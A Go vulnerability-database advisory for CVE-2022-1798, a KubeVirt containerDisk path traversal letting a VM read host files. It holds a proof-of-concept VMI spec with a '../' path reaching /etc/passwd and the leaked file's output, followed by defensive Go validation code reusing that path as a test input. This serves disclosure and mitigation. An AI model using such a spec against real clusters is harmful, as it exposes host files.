See doc/triage.md for instructions on how to triage this report.
modules:
  - module: TODO
    versions:
      - {}
    packages:
      - package: kubevirt.io/kubevirt
description: |
  **Summary**
  As part of a Kubevirt audit performed by NCC group, a finding dealing with systemic lack of path sanitization which leads to a path traversal was identified. Google tested the exploitability of the paths in the audit report and identified that when combined with another vulnerability one of the paths leads to an arbitrary file read on the host from the VM.

  The read operations are limited to files which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/<> is not accessible.

  **Severity**

  Moderate - The vulnerability is proven to exist in an open source version of KubeVirt by NCC Group while being combined with Systemic Lack of Path Sanitization, which leads to Path traversal.

  **Proof of Concept**

  The initial VMI specifications can be written as such to reproduce the issue:

  ```
  apiVersion: kubevirt.io/v1
  kind: VirtualMachineInstance
  metadata:
    name: vmi-fedora
  spec:
    domain:
      devices:
        disks:
        - disk:
            bus: virtio
          name: containerdisk
        - disk:
            bus: virtio
          name: cloudinitdisk
        - disk:
            bus: virtio
          name: containerdisk1
        rng: {}
      resources:
        requests:
          memory: 1024M
    terminationGracePeriodSeconds: 0
    volumes:
    - containerDisk:
        image: quay.io/kubevirt/cirros-container-disk-demo:v0.52.0
      name: containerdisk
    - containerDisk:
        image: quay.io/kubevirt/cirros-container-disk-demo:v0.52.0
        path: test3/../../../../../../../../etc/passwd
      name: containerdisk1
    - cloudInitNoCloud:
        userData: |
          #!/bin/sh
          echo 'just something to make cirros happy'
      name: cloudinitdisk
  ```
  The VMI can then be started through kubectl apply -f vm-test-ncc.yaml.
  The requested file is accessible once the VM is up and can be accessed under /dev/vdc.

  Depending on the environment, path may contain more or less /.., something that can easily be tested by checking the events until the VMI can start without failure.
  Restrictions

  SELinux may mitigate this vulnerability.

  When using a node with selinux, selinux denies the access and the VM start was aborted:

  ```
  19s Warning SyncFailed virtualmachineinstance/vmi-fedora server error. command SyncVMI failed: "preparing ephemeral container disk images failed: stat /var/run/kubevirt/container-disks/disk_0.img: permission denied"

  type=AVC msg=audit(1651828898.296:1266): avc: denied { setattr } for pid=44402 comm="rpc-worker" name="passwd" dev="vda1" ino=691477 scontext=system_u:system_r:virt_launcher.process:s0:c255,c849 tcontext=system_u:object_r:passwd_file_t:s0 tclass=file permissive=1
  ```

  After making selinux permissive the VM can boot and access /etc/passwd from the node within the guest:

  ```
  $ sudo cat /dev/vdc
  root:x:0:0:root:/root:/bin/bash
  bin:x:1:1:bin:/bin:/sbin/nologin
  daemon:x:2:2:daemon:/sbin:/sbin/nologin
  adm:x:3:4:adm:/var/adm:/sbin/nologin
  lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  [...]
  ```

  **Further Analysis**
  In order to mitigate this vulnerability, Sanitize imagePath in pkg/container-disk/container-disk.go following ISE best practices described and Add checks in pkg/virt-api/webhooks/validating-webhook/admitters/vmi-create-admitter.go

  **Timeline**
  Date reported: 05/10/2022
  Date fixed: N/A
  Date disclosed: 08/08/2022
published: 2022-08-18T19:02:18Z
last_modified: 2022-08-19T17:10:16Z
cves:
  - CVE-2022-1798
ghsas:
  - GHSA-cvx8-ppmc-78hm
links:
  context:
    - https://github.com/advisories/GHSA-cvx8-ppmc-78hm
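The Further Analysis section of the report names two places for the fix: sanitizing the containerDisk `path` in pkg/container-disk/container-disk.go and adding checks in the VMI create admitter. The Go below is an added illustration of both checks written for this page; it is not KubeVirt's code, and the function names, the `/mnt/containerdisk` base directory and the sample paths are constructed for the example. The first function is the strict admission-time check (reject absolute paths and any `..` component); the second is the node-side containment check that joins the path onto its base directory and verifies the cleaned result did not climb above it, so the report's `test3/../../../../../../../../etc/passwd` is refused even if it reaches the node.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrPathEscapes is returned when a containerDisk path would resolve outside
// the directory the container disk image is served from.
var ErrPathEscapes = errors.New("containerDisk path escapes its base directory")

// AdmitContainerDiskPath is the kind of check a validating admission webhook
// could apply to spec.volumes[].containerDisk.path before the VMI is accepted.
// It is deliberately strict: absolute paths and any ".." component are
// rejected, so a traversal path never reaches the node at all.
// (Hypothetical function written for this example, not KubeVirt's admitter.)
func AdmitContainerDiskPath(userPath string) error {
	if userPath == "" {
		// Empty means "use the default disk path" (assumption for this example).
		return nil
	}
	if filepath.IsAbs(userPath) {
		return fmt.Errorf("containerDisk path %q must be relative", userPath)
	}
	for _, part := range strings.Split(filepath.ToSlash(userPath), "/") {
		if part == ".." {
			return fmt.Errorf("containerDisk path %q must not contain '..'", userPath)
		}
	}
	return nil
}

// ResolveContainerDiskPath is the defence-in-depth check for the node side:
// join userPath onto baseDir and verify the cleaned result still lies inside
// baseDir. filepath.Join cleans its result, so a run of "../" that climbs
// above baseDir shows up as a relative path that starts with "..", and a
// sibling directory with a shared prefix (baseDir + "-evil") is caught too,
// which a plain string-prefix test would miss.
// (Hypothetical function; baseDir is a constructed value in main.)
func ResolveContainerDiskPath(baseDir, userPath string) (string, error) {
	if filepath.IsAbs(userPath) {
		return "", ErrPathEscapes
	}
	base := filepath.Clean(baseDir)
	joined := filepath.Join(base, userPath)
	rel, err := filepath.Rel(base, joined)
	if err != nil {
		return "", err
	}
	if rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrPathEscapes
	}
	return joined, nil
}

func main() {
	// Constructed inputs: the traversal path from the report, a benign
	// relative path and an absolute path.
	for _, p := range []string{
		"test3/../../../../../../../../etc/passwd",
		"images/disk.img",
		"/etc/passwd",
	} {
		fmt.Printf("admit   %q: %v\n", p, AdmitContainerDiskPath(p))
		resolved, err := ResolveContainerDiskPath("/mnt/containerdisk", p)
		fmt.Printf("resolve %q: %q %v\n", p, resolved, err)
	}
}
```

Both checks are lexical. If the container image itself can contain symlinks, the node-side code should additionally resolve the joined path with filepath.EvalSymlinks on the mounted filesystem and repeat the containment test on the result; that step needs a real filesystem and is not shown here.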
In GitHub Security Advisory GHSA-cvx8-ppmc-78hm, there is a vulnerability in the following Go packages or modules: